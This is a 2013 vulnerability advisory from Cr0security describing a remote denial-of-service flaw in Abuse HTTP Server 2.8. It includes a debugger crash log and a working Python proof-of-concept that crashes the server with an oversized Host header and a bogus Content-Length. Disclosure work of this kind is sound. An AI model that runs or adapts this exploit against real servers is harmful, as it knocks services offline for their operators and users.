Advisory Information : ====================== Title : Abuse HTTP Server 2.8 - Remote Denial Of Service Advisory ID : Cr02013-002 Product : HTTP Server Vendor : SmartUX Vulnerable Version(s) : 2.8 and probably prior release Tested Version : 2.8 Tested On : Windows XP, Windows 7 Vulnerability Type / CWE ID : Improper Resource Shutdown or Release / [CWE-404] Risk Level : High CVSSv2 Base Score : 9.7 (AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:U/RC:C/CDP:LM/TD:H/CR:L/IR:L/AR:H) Discovered By : Zico (Zee Eichel) Ekel of cr0security - zee[at]cr0security.com - http://www.cr0security.com Introduction : ============== Abuse HTTP Server is a small program designed to become a WebServer. - Based on / Copied from : http://abuse-httpd.sourceforge.net/ Advisory Details: ================= Abuse HTTP Server suffers from Remote Denial Of Service (DOS). The Attacker could make Abuse HTTP Server disconnect connection while client is connected to Abuse HTTP server. Proof Of Concept : ================== The Attacker run this remote exploit DOS code targeted to remote server host, and the connection between server and android client will be disconected or terminated. With debugging (Log-using ollydbg) : Log data, item 3 Address=7C8106E9 (crash address) Message=New thread with ID 000006D0 created Log data, item 2 Message=Thread 000006D0 terminated, exit code 0 Log data, item 1 Message=Thread 00000794 terminated, exit code CB (203.) Log data, item 0 Message=Process terminated, exit code CB (203.) Register FPU log : EAX 00000000 ECX 7C800000 kernel32.7C800000 EDX 7C97B120 ntdll.7C97B120 EBX 00000000 ESP 0012EDD4 EBP 0012EED0 ESI 7C90DE50 ntdll.ZwTerminateProcess EDI 000000CB EIP 7C90E4F4 ntdll.KiFastSystemCallRet C 0 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 1 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDE000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_CLASS_HAS_WINDOWS (00000584) EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty -??? FFFF 00FF00FF 00FF00FF ST1 empty -??? FFFF 00FF00FF 00FF00FF ST2 empty -??? FFFF 00FE00B2 006E007A ST3 empty -??? FFFF 00FE00B2 006B0077 ST4 empty -NAN FFFF FFB36B77 FFB36E7A ST5 empty -??? FFFF 00FF00B3 006B0077 ST6 empty -??? FFFF 00000000 00000000 ST7 empty -??? FFFF 00800080 00800080 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0 SEH chain of main thread: Address SE handler 0012FC50 kernel32.7C839AC0 0012FCA8 Abuse.0040D7E3 0012FD78 USER32.7E44048F 0012FDD8 USER32.7E44048F 0012FEF0 USER32.7E44048F 0012FF50 USER32.7E44048F 0012FFE0 kernel32.7C839AC0 Sample dummy tool for disconected only ====================================== --- Python Remote DOS code --- #!/usr/bin/python import socket import os import sys crash = "0" * 504 buffer="GET / HTTP/1.1\r\n" buffer+="Host: " + crash + "\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n" buffer+="Content-Length : 1048580\r\n\r\n" print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com" print "[*] Change some option in code with your self" print "[*] Connect to host and send payload" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.101", 80)) expl.send(buffer) print "[*] Server Disconected" expl.close() ------------- EOF ------------- Report-Timeline : ================= 29/09/2013 : Vendor Contacted / No response. 30/09/2013 : Public Disclosure. Remediation : ============= There isn't remediation step from the Vendor until this Public Disclosure. References : ============ - Common Weakness Enumeration (CWE) - http://cwe.mitre.org - Share KM - http://abuse-httpd.sourceforge.net/ About Cr0security : =================== Cr0security is a company that moved on "Information and Technologies" especially on Computer Security System, Network Security, and Secure Computer Application Development. with a reference to the publics needs of using the information system technology with better security, Cr0security ready to help you to reach secure point and creating a comfortable moment while you are perform any activities through your networks or computers at once. In computer software development we also implement the "Secure Programming". so security of the applications, the data, and the computer will be strictly maintained. Beside we can act as your Consultant, We can act as your partner to achieve the best solution. Contact Cr0security : ===================== Email : info[at]cr0security.com Website : http://www.cr0security.com Disclaimer : ============ The information provided in this advisory is provided "as is" without warranty of any kind. Cr0security disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Cr0security or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Cr0security or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.